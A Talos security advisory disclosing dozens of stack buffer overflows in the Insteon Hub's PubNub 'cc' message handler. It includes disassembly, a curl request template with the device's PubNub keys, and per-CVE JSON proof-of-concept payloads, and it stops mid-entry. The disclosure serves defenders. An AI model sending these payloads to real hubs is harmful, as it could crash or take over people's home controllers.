Talos Vulnerability Report

TALOS-2017-0483

Insteon Hub PubNub "cc" Channel Message Handler Multiple Stack Overflow Code Execution Vulnerabilities

June 19, 2018
CVE Number

CVE-2017-16252, CVE-2017-16253, CVE-2017-16254, CVE-2017-16255, CVE-2017-16256, CVE-2017-16257, CVE-2017-16258, CVE-2017-16259, CVE-2017-16260, CVE-2017-16261, CVE-2017-16262, CVE-2017-16263, CVE-2017-16264, CVE-2017-16265, CVE-2017-16266, CVE-2017-16267, CVE-2017-16268, CVE-2017-16269, CVE-2017-16270, CVE-2017-16271, CVE-2017-16272, CVE-2017-16273, CVE-2017-16274, CVE-2017-16275, CVE-2017-16276, CVE-2017-16277, CVE-2017-16278, CVE-2017-16279, CVE-2017-16280, CVE-2017-16281, CVE-2017-16282, CVE-2017-16283, CVE-2017-16284, CVE-2017-16285, CVE-2017-16286, CVE-2017-16287, CVE-2017-16288, CVE-2017-16289, CVE-2017-16290, CVE-2017-16291, CVE-2017-16292, CVE-2017-16293, CVE-2017-16294, CVE-2017-16295, CVE-2017-16296, CVE-2017-16297, CVE-2017-16298, CVE-2017-16299, CVE-2017-16300, CVE-2017-16301, CVE-2017-16302, CVE-2017-16303, CVE-2017-16304, CVE-2017-16305, CVE-2017-16306, CVE-2017-16307, CVE-2017-16308, CVE-2017-16309, CVE-2017-16310, CVE-2017-16311, CVE-2017-16312, CVE-2017-16313, CVE-2017-16314, CVE-2017-16315, CVE-2017-16316, CVE-2017-16317, CVE-2017-16318, CVE-2017-16319, CVE-2017-16320, CVE-2017-16321, CVE-2017-16322, CVE-2017-16323, CVE-2017-16324, CVE-2017-16325, CVE-2017-16326, CVE-2017-16327, CVE-2017-16328, CVE-2017-16329, CVE-2017-16330, CVE-2017-16331, CVE-2017-16332, CVE-2017-16333, CVE-2017-16334, CVE-2017-16335, CVE-2017-16336, CVE-2017-16337

Summary

Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability.

Tested Versions

Insteon Hub 2245-222 - Firmware version 1012

Product URLs

http://www.insteon.com/insteon-hub

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-121: Stack-based Buffer Overflow

Details

Insteon produces a series of devices aimed at controlling and monitoring a home: wall switches, led bulbs, thermostats, cameras, etc. One of those is Insteon Hub, a central controller which allows an end-user to use his smartphone to connect to his own house remotely and manage any other device through it. The Insteon Hub board utilizes several MCUs, the firmware in question is executed by a Microchip PIC32MX MCU, which has a MIPS32 architecture.

The firmware uses Microchip's "Libraries for Applications" as core for the application code. Its functionality resides on a co-operative multitasking loop, which continuously executes all the existing tasks: the library already defines several tasks, e.g. for reading and sending network packets and calling the relative callbacks. Custom applications building on this library simply need to add new functions at the end of the loop, taking care of executing tasks as quickly as possible, or splitting them in several loop cycles, in order to let other tasks running smoothly.

To enable remote interaction via the Internet, Insteon Hub uses an online service called PubNub (https://www.pubnub.com/). End-users install the "Insteon for Hub" application on their smartphone. Both the smartphone application and Insteon Hub include the PubNub SDK, which allows for a bi-directional communication using PubNub's REST API.

The interaction with PubNub happens by means of publish/subscribe methods. Each device has a series of channels it can subscribe to, in order to receive published messages. To subscribe to a specific channel it's enough to call the function pubnub_subscribe (defined in the PubNub SDK), passing as parameter the channel name and a callback function that will be called when a message is received on the specified channel.

The device defines a function which parses messages received from PubNub on channel "cc": sub_9d014b1c. The function uses the cJSON library for parsing "JSON" messages and receives a cJSON object as parameter, which corresponds to the message sent from an authenticated smartphone application. As an example, this is a valid JSON message which is used to change the username/password pair of the device:

{
    "ser": "",
    "cmd": "s_auth",
    "usr": "myuser",
    "pwd": "mypwd"
}

The function initially checks the cmd parameter, and depending on that it proceeds to extract other expected parameters, in this case usr and pwd. The information is then either cached to be handled on the next multitasking loop, or immediately applied from within the current function.

The vulnerable code exists while parsing any JSON element, the following example is the disassembly of the path for the "s_auth" command:

seg000:9D014B1C                 sub_9d014b1c:
seg000:9D014B1C
seg000:9D014B1C                 var_418         = -0x418
seg000:9D014B1C                 var_414         = -0x414
seg000:9D014B1C                 var_410         = -0x410
...
seg000:9D014B1C                 var_14          = -0x14
seg000:9D014B1C                 var_10          = -0x10
seg000:9D014B1C                 var_C           = -0xC
seg000:9D014B1C                 var_8           = -8
seg000:9D014B1C                 var_4           = -4
seg000:9D014B1C
seg000:9D014B1C 000 D8 FB BD 27        addiu   $sp, -0x428
seg000:9D014B20 428 24 04 BF AF        sw      $ra, 0x428+var_4($sp)
seg000:9D014B24 428 20 04 BE AF        sw      $fp, 0x428+var_8($sp)
seg000:9D014B28 428 1C 04 B7 AF        sw      $s7, 0x428+var_C($sp)
seg000:9D014B2C 428 18 04 B6 AF        sw      $s6, 0x428+var_10($sp)
seg000:9D014B30 428 14 04 B5 AF        sw      $s5, 0x428+var_14($sp)
seg000:9D014B34 428 10 04 B4 AF        sw      $s4, 0x428+var_18($sp)
seg000:9D014B38 428 0C 04 B3 AF        sw      $s3, 0x428+var_1C($sp)
seg000:9D014B3C 428 08 04 B2 AF        sw      $s2, 0x428+var_20($sp)
seg000:9D014B40 428 04 04 B1 AF        sw      $s1, 0x428+var_24($sp)
seg000:9D014B44 428 00 04 B0 AF        sw      $s0, 0x428+var_28($sp)
seg000:9D014B48 428 21 90 80 00        move    $s2, $a0                # ptr to cJSON object
seg000:9D014B4C 428 21 98 A0 00        move    $s3, $a1
...
seg000:9D014C60 428 21 20 40 02        move    $a0, $s2
seg000:9D014C64 428 06 9D 05 3C        lui     $a1, 0x9D06
seg000:9D014C68 428 F3 43 41 0F        jal     cJSON_GetObjectItem
seg000:9D014C6C 428 24 28 A5 24        la      $a1, aCmd               # "cmd"
seg000:9D014C70 428 0F 00 40 54        bnezl   $v0, loc_9D014CB0
...
seg000:9D014CB0                 loc_9D014CB0:
seg000:9D014CB0 428 06 9D 05 3C        lui     $a1, 0x9D06
seg000:9D014CB4 428 F3 43 41 0F        jal     cJSON_GetObjectItem
seg000:9D014CB8 428 24 28 A5 24        la      $a1, aCmd               # "cmd"
seg000:9D014CBC 428 1C 01 A4 27        addiu   $a0, $sp, 0x428+var_30C
seg000:9D014CC0 428 1F DF 41 0F        jal     strcpy
seg000:9D014CC4 428 10 00 45 8C        lw      $a1, 0x10($v0)
...
seg000:9D0153F4                 loc_9D0153F4:
seg000:9D0153F4 428 06 9D 05 3C        lui     $a1, 0x9D06
seg000:9D0153F8 428 87 E7 41 0F        jal     strcmp
seg000:9D0153FC 428 54 2A A5 24        la      $a1, aS_auth            # "s_auth"
seg000:9D015400 428 B2 00 40 14        bnez    $v0, loc_9D0156CC       # goto next cmd
seg000:9D015404 428 1C 01 A4 27        addiu   $a0, $sp, 0x428+var_30C
seg000:9D015408 428 21 20 40 02        move    $a0, $s2
seg000:9D01540C 428 06 9D 05 3C        lui     $a1, 0x9D06
seg000:9D015410 428 F3 43 41 0F        jal     cJSON_GetObjectItem
seg000:9D015414 428 5C 2A A5 24        la      $a1, aUsr               # "usr"
seg000:9D015418 428 0F 00 40 10        beqz    $v0, loc_9D015458       # goto fail
seg000:9D01541C 428 21 20 40 02        move    $a0, $s2
seg000:9D015420 428 06 9D 05 3C        lui     $a1, 0x9D06
seg000:9D015424 428 F3 43 41 0F        jal     cJSON_GetObjectItem
seg000:9D015428 428 5C 2A A5 24        la      $a1, aUsr               # "usr"
seg000:9D01542C 428 90 02 A4 27        addiu   $a0, $sp, 0x428+var_198
seg000:9D015430 428 1F DF 41 0F        jal     strcpy
seg000:9D015434 428 10 00 45 8C        lw      $a1, 0x10($v0)
seg000:9D015438 428 21 20 40 02        move    $a0, $s2
seg000:9D01543C 428 06 9D 05 3C        lui     $a1, 0x9D06
seg000:9D015440 428 F3 43 41 0F        jal     cJSON_GetObjectItem
seg000:9D015444 428 60 2A A5 24        la      $a1, aPwd               # "pwd"
seg000:9D015448 428 07 00 40 14        bnez    $v0, loc_9D015468
seg000:9D01544C 428 21 20 40 02        move    $a0, $s2
seg000:9D015450 428 28 55 40 0B        j       loc_9D0154A0            # goto fail
seg000:9D015454 428 00 00 00 00        nop
seg000:9D015458
seg000:9D015458                 loc_9D015458:
seg000:9D015458 428 BD 43 40 0F        jal     insteon_pubnub_send_fail
seg000:9D01545C 428 21 28 60 02        move    $a1, $s3
seg000:9D015460 428 49 7C 40 0B        j       loc_9D01F124
seg000:9D015464 428 24 04 BF 8F        lw      $ra, 0x428+var_4($sp)
seg000:9D015468
seg000:9D015468                 loc_9D015468:
seg000:9D015468 428 06 9D 05 3C        lui     $a1, 0x9D06
seg000:9D01546C 428 F3 43 41 0F        jal     cJSON_GetObjectItem
seg000:9D015470 428 60 2A A5 24        la      $a1, aPwd               # "pwd"
seg000:9D015474 428 B0 02 A4 27        addiu   $a0, $sp, 0x428+var_178
seg000:9D015478 428 1F DF 41 0F        jal     strcpy
seg000:9D01547C 428 10 00 45 8C        lw      $a1, 0x10($v0)
...
seg000:9D0154A0                 loc_9D0154A0:
seg000:9D0154A0 428 BD 43 40 0F        jal     insteon_pubnub_send_fail
seg000:9D0154A4 428 21 28 60 02        move    $a1, $s3
seg000:9D0154A8 428 49 7C 40 0B        j       loc_9D01F124
seg000:9D0154AC 428 24 04 BF 8F        lw      $ra, 0x428+var_4($sp)

Looking at the pseudocode:

if (cJSON_GetObjectItem(obj, "cmd")) {
    strcpy(buf_cmd, cJSON_GetObjectItem(obj, "cmd")->valuestring);
    if      (!strcmp(buf_cmd, "..."))
    ...
    else if (!strcmp(buf_cmd, "..."))
    ...
    else if (!strcmp(buf_cmd, "s_auth")) {
        if (!cJSON_GetObjectItem(obj, "usr")) goto fail;
        strcpy(buf_usr, cJSON_GetObjectItem(obj, "usr")->valuestring);
        if (!cJSON_GetObjectItem(obj, "pwd")) goto fail;
        strcpy(buf_pwd, cJSON_GetObjectItem(obj, "pwd")->valuestring);
        ...
    }
    ...
}

The src parameter for strcpy is unconstrained, and can lead to a buffer overflow, in the above example a stack-based one. This same sequence of vulnerable instructions is present for every supported keyword in the message handler.

To send a message, an HTTP GET should be used which embeds the JSON string in the "path" portion of the URL:

$ curl https://pubsub.pubnub.com/publish/<pub>/<sub>/<callback>/<channel>/<payload>?auth=<auth-key>

<pub>: PubNub's publishKey. The device uses pub-c-a415cc66-b0ca-4d1d-8d9e-947390b35df3
<sub>: PubNub's subscribeKey. The device uses sub-c-e1c54032-1685-11e4-b69f-02ee2ddab7fe
<callback>: can be set to 0
<channel>: composed by "<insteon-id>-<channel-suffix>". <insteon-id> corresponds to the lower 3 octets of the MAC address and <channel-suffix> is the actual channel name, in this case "cc" (example of full channel name: 112233-cc)
<payload>: contains the JSON message string, the minimal JSON for Insteon is {"ser":""}
<auth-key>: key for access control, 16 bytes hex-encoded

Example:

$ curl 'https://pubsub.pubnub.com/publish/pub-c-a415cc66-b0ca-4d1d-8d9e-947390b35df3/sub-c-e1c54032-1685-11e4-b69f-02ee2ddab7fe/0/112233-cc/
0/\{"ser":"","cmd":"s_auth","usr":"newusr","pwd":"newpwd"\}?auth=00112233445566778899AABBCCDDEEFF'

The following is a list of vulnerable strcpy calls and their Proof-of-Concept. Each PoC shows only the payload portion of the request and uses the placeholder "OVERFLOW" to highlight the vulnerable parameter, which can be replaced with "A"*0x400 to make the device crash. All buffer overflows below happen on the stack, and allow for overwriting arbitrarily all $s-registers, saved-pc and saved-fp. A key with value "x" means that its value is irrelevant.

CVE-2017-16252 - cmd key

At 0x9d014cc0 the value for the cmd key is copied using strcpy to the buffer at $sp+0x11c. This buffer is 20 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "OVERFLOW"}

CVE-2017-16253 - cmd sn_sx, id key

At 0x9d014dd8 the value for the id key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_sx", "id": "OVERFLOW", "flg": "x", "cmd1": "x", "cmd2": "x"}

CVE-2017-16254 - cmd sn_sx, flg key

At 0x9d014e4c the value for the flg key is copied using strcpy to the buffer at $sp+0x270. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_sx", "id": "x", "flg": "OVERFLOW", "cmd1": "x", "cmd2": "x"}

CVE-2017-16255 - cmd sn_sx, cmd1 key

At 0x9d014e84 the value for the cmd1 key is copied using strcpy to the buffer at $sp+0x280. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_sx", "id": "x", "flg": "x", "cmd1": "OVERFLOW", "cmd2": "x"}

CVE-2017-16256 - cmd sn_sx, cmd2 key

At 0x9d014ebc the value for the cmd2 key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_sx", "id": "x", "flg": "x", "cmd1": "x", "cmd2": "OVERFLOW"}

CVE-2017-16257 - cmd sn_sx, cmd3 key

At 0x9d014f28 the value for the cmd3 key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_sx", "id": "x", "flg": "x", "cmd1": "x", "cmd2": "x", "cmd3": "OVERFLOW"}

CVE-2017-16258 - cmd sn_sx, cmd4 key

At 0x9d014f7c the value for the cmd4 key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_sx", "id": "x", "flg": "x", "cmd1": "x", "cmd2": "x", "cmd4": "OVERFLOW"}

CVE-2017-16259 - cmd s_auth, usr key

At 0x9d015430 the value for the usr key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_auth", "usr": "OVERFLOW"}

CVE-2017-16260 - cmd s_auth, pwd key

At 0x9d015478 the value for the pwd key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_auth", "usr": "x", "pwd": "OVERFLOW"}

CVE-2017-16261 - cmd g_b, grp key

At 0x9d015714 the value for the grp key is copied using strcpy to the buffer at $sp+0x280. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "g_b", "grp": "OVERFLOW"}

CVE-2017-16262 - cmd g_b, id key

At 0x9d015864 the value for the id key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "g_b", "grp": "x", "id": "OVERFLOW"}

Note: grp needs to be either a hex number lower than 0x3e9 (e.g. "grp": "3e8"), or any invalid hex digit.

CVE-2017-16263 - cmd g_b, val key

At 0x9d015a8c the value for the val key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "g_b", "grp": "x", "val": "OVERFLOW"}

Note: grp needs to be either a hex number lower than 0x3e9 (e.g. "grp": "3e8"), or any invalid hex digit.

CVE-2017-16264 - cmd l_b, grp key

At 0x9d015cfc the value for the grp key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "l_b", "grp": "OVERFLOW"}

CVE-2017-16265 - cmd l_bt, grp key

At 0x9d016104 the value for the grp key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "l_bt", "grp": "OVERFLOW"}

CVE-2017-16266 - cmd s_b, grp key

At 0x9d016530 the value for the grp key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_b", "grp": "OVERFLOW"}

CVE-2017-16267 - cmd s_b, val key

At 0x9d016578 the value for the val key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_b", "grp": "x", "val": "OVERFLOW"}

CVE-2017-16268 - cmd s_b, id key

At 0x9d0165c0 the value for the id key is copied using strcpy to the buffer at $sp+0x270. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_b", "grp": "x", "val": "x", "id": "OVERFLOW"}

CVE-2017-16269 - cmd sb, sspeaker key

At 0x9d01672c the value for the s_speaker key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_b", "grp": "x", "val": "x", "id": "x", "s_speaker": "OVERFLOW"}

CVE-2017-16270 - cmd sb, ssonos_cmd key

At 0x9d01679c the value for the s_sonos_cmd key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_b", "grp": "x", "val": "x", "id": "x", "s_sonos_cmd": "OVERFLOW"}

CVE-2017-16271 - cmd el, asc key

At 0x9d016c94 the value for the as_c key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "e_l", "as_c": "OVERFLOW"}

CVE-2017-16272 - cmd e_l, grp key

At 0x9d016cf0 the value for the grp key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "e_l", "as_c": "1", "grp": "OVERFLOW"}

Note: as_c needs to be exactly "1"

CVE-2017-16273 - cmd e_ml, grp key

At 0x9d016fa8 the value for the grp key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "e_ml", "grp": "OVERFLOW"}

CVE-2017-16274 - cmd e_u, grp key

At 0x9d017364 the value for the grp key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "e_u", "grp": "OVERFLOW"}

CVE-2017-16275 - cmd sn_grp, grp key

At 0x9d01758c the value for the grp key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_grp", "grp": "OVERFLOW"}

CVE-2017-16276 - cmd sn_grp, gbt key

At 0x9d0175f4 the value for the gbt key is copied using strcpy to the buffer at $sp+0x280. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_grp", "grp": "x", "gbt": "OVERFLOW"}

CVE-2017-16277 - cmd sn_grp, gcmd key

At 0x9d017658 the value for the gcmd key is copied using strcpy to the buffer at $sp+0x270. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_grp", "grp": "x", "gbt": "x", "gcmd": "OVERFLOW"}

CVE-2017-16278 - cmd s_net, ip key

At 0x9d01815c the value for the ip key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_net", "ip": "OVERFLOW"}

CVE-2017-16279 - cmd s_net, port key

At 0x9d0181a4 the value for the port key is copied using strcpy to the buffer at $sp+0x280. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_net", "ip": "x", "port": "OVERFLOW"}

CVE-2017-16280 - cmd s_net, gate key

At 0x9d0181ec the value for the gate key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_net", "ip": "x", "port": "x", "gate": "OVERFLOW"}

CVE-2017-16281 - cmd s_net, sub key

At 0x9d018234 the value for the sub key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_net", "ip": "x", "port": "x", "gate": "x", "sub": "OVERFLOW"}

CVE-2017-16282 - cmd s_net, dhcp key

At 0x9d01827c the value for the dhcp key is copied using strcpy to the buffer at $sp+0x270. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_net", "ip": "x", "port": "x", "gate": "x", "sub": "x", "dhcp": "OVERFLOW"}

CVE-2017-16283 - cmd s_name, name key

At 0x9d0188a8 the value for the name key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_name", "name": "OVERFLOW"}

CVE-2017-16284 - cmd s_name, city key

At 0x9d018958 the value for the city key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_name", "city": "OVERFLOW"}

CVE-2017-16285 - cmd s_time, offset key

At 0x9d018e58 the value for the offset key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_time", "offset": "OVERFLOW"}

CVE-2017-16286 - cmd s_time, dststart key

At 0x9d018ea0 the value for the dststart key is copied using strcpy to the buffer at $sp+0x280. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_time", "offset": "x", "dststart": "OVERFLOW"}

CVE-2017-16287 - cmd s_time, dstend key

At 0x9d018f00 the value for the dstend key is copied using strcpy to the buffer at $sp+0x270. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_time", "offset": "x", "dststart": "xxxxx", "dstend": "OVERFLOW"}

Note: 'dststart' must be 5 characters long.

CVE-2017-16288 - cmd s_time, dst key

At 0x9d018f60 the value for the dst key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_time", "offset": "x", "dststart": "xxxxx", "dstend": "xxxxx", "dst": "OVERFLOW"}

Note: both 'dststart' and 'dstend' must be 5 characters long.

CVE-2017-16289 - cmd s_utc, offset key

At 0x9d0193ac the value for the offset key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_utc", "offset": "OVERFLOW"}

CVE-2017-16290 - cmd s_sun, sunrise key

At 0x9d01980c the value for the sunrise key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sun", "sunrise": "OVERFLOW"}

CVE-2017-16291 - cmd s_sun, sunset key

At 0x9d019854 the value for the sunset key is copied using strcpy to the buffer at $sp+0x334. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sun", "sunrise": "x", "sunset": "OVERFLOW"}

CVE-2017-16292 - cmd g_schd, grp key

At 0x9d019c50 the value for the grp key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "g_schd", "grp": "OVERFLOW"}

CVE-2017-16293 - cmd s_schd, grp key

At 0x9d01a010 the value for the grp key is copied using strcpy to the buffer at $sp+0x280. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_schd", "grp": "OVERFLOW"}

CVE-2017-16294 - cmd s_schd, on key

At 0x9d01a144 the value for the on key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_schd", "grp": "x", "on": "OVERFLOW"}

Note: grp needs to be either a hex number lower than 0x3e9 (e.g. "grp": "3e8"), or any invalid hex digit.

CVE-2017-16295 - cmd s_schd, off key

At 0x9d01a18c the value for the off key is copied using strcpy to the buffer at $sp+0x270. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_schd", "grp": "x", "on": "x", "off": "OVERFLOW"}

Note: grp needs to be either a hex number lower than 0x3e9 (e.g. "grp": "3e8"), or any invalid hex digit.

CVE-2017-16296 - cmd s_schd, days key

At 0x9d01a1d4 the value for the days key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_schd", "grp": "x", "on": "x", "off": "x", "days": "OVERFLOW"}

Note: grp needs to be either a hex number lower than 0x3e9 (e.g. "grp": "3e8"), or any invalid hex digit.

CVE-2017-16297 - cmd s_schd, oncmd key

At 0x9d01a21c the value for the oncmd key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_schd", "grp": "x", "on": "x", "off": "x", "days": "x", "oncmd": "OVERFLOW"}

Note: grp needs to be either a hex number lower than 0x3e9 (e.g. "grp": "3e8"), or any invalid hex digit.

CVE-2017-16298 - cmd s_schd, offcmd key

At 0x9d01a264 the value for the offcmd key is copied using strcpy to the buffer at $sp+0x334. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_schd", "grp": "x", "on": "x", "off": "x", "days": "x", "oncmd": "x", "offcmd": "OVERFLOW"}

Note: grp needs to be either a hex number lower than 0x3e9 (e.g. "grp": "3e8"), or any invalid hex digit.

CVE-2017-16299 - cmd sn_raw, d key

At 0x9d01aad8 the value for the d key is copied using strcpy to the buffer at $sp+0x334. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_raw", "d": "OVERFLOW"}

CVE-2017-16300 - cmd sn_ex, id key

At 0x9d01ac74 the value for the id key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_ex", "id": "OVERFLOW"}

CVE-2017-16301 - cmd sn_ex, flg key

At 0x9d01ad14 the value for the flg key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_ex", "id": "x", "flg": "OVERFLOW"}

CVE-2017-16302 - cmd sn_ex, cmd1 key

At 0x9d01ad78 the value for the cmd1 key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_ex", "id": "x", "flg": "x", "cmd1": "OVERFLOW"}

CVE-2017-16303 - cmd sn_ex, cmd2 key

At 0x9d01addc the value for the cmd2 key is copied using strcpy to the buffer at $sp+0x280. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_ex", "id": "x", "flg": "x", "cmd1": "x", "cmd2": "OVERFLOW"}

CVE-2017-16304 - cmd sn_ex, d key

At 0x9d01ae40 the value for the d key is copied using strcpy to the buffer at $sp+0x334. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_ex", "id": "x", "flg": "x", "cmd1": "x", "cmd2": "x", "d": "OVERFLOW"}

CVE-2017-16305 - cmd sn_exw, id key

At 0x9d01b20c the value for the id key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_exw", "id": "OVERFLOW"}

CVE-2017-16306 - cmd sn_exw, flg key

At 0x9d01b2ac the value for the flg key is copied using strcpy to the buffer at $sp+0x280. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_exw", "id": "x", "flg": "OVERFLOW"}

CVE-2017-16307 - cmd sn_exw, cmd1 key

At 0x9d01b310 the value for the cmd1 key is copied using strcpy to the buffer at $sp+0x2d0. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_exw", "id": "x", "flg": "x", "cmd1": "OVERFLOW"}

CVE-2017-16308 - cmd sn_exw, cmd2 key

At 0x9d01b374 the value for the cmd2 key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_exw", "id": "x", "flg": "x", "cmd1": "x", "cmd2": "OVERFLOW"}

CVE-2017-16309 - cmd sn_exw, d key

At 0x9d01b3d8 the value for the d key is copied using strcpy to the buffer at $sp+0x334. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "sn_exw", "id": "x", "flg": "x", "cmd1": "x", "cmd2": "x", "d": "OVERFLOW"}

CVE-2017-16310 - cmd s_ch, ch key

At 0x9d01b7b0 the value for the ch key is copied using strcpy to the buffer at $sp+0x334. This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_ch", "ch": "OVERFLOW"}

CVE-2017-16311 - cmd UpdateCheck, type key

At 0x9d01bb64 the value for the type key is copied using strcpy to the buffer at $sp+0x270. This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "UpdateCheck", "host": "x", "uri": "x", "type": "OVERFLOW"}

CVE-2017-16312 - cmd ssonos, sndiscover key

At 0x9d01c028 the value for the sn_discover key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "sn_discover": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16313 - cmd ssonos, sddelay key

At 0x9d01c084 the value for the s_ddelay key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "sn_discover": "0", "s_ddelay": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

Note: sn_discover needs to be a hex number lower than 0x100.

CVE-2017-16314 - cmd ssonos, sspeaker key

At 0x9d01c1cc the value for the s_speaker key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "s_speaker": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16315 - cmd ssonos, sstate key

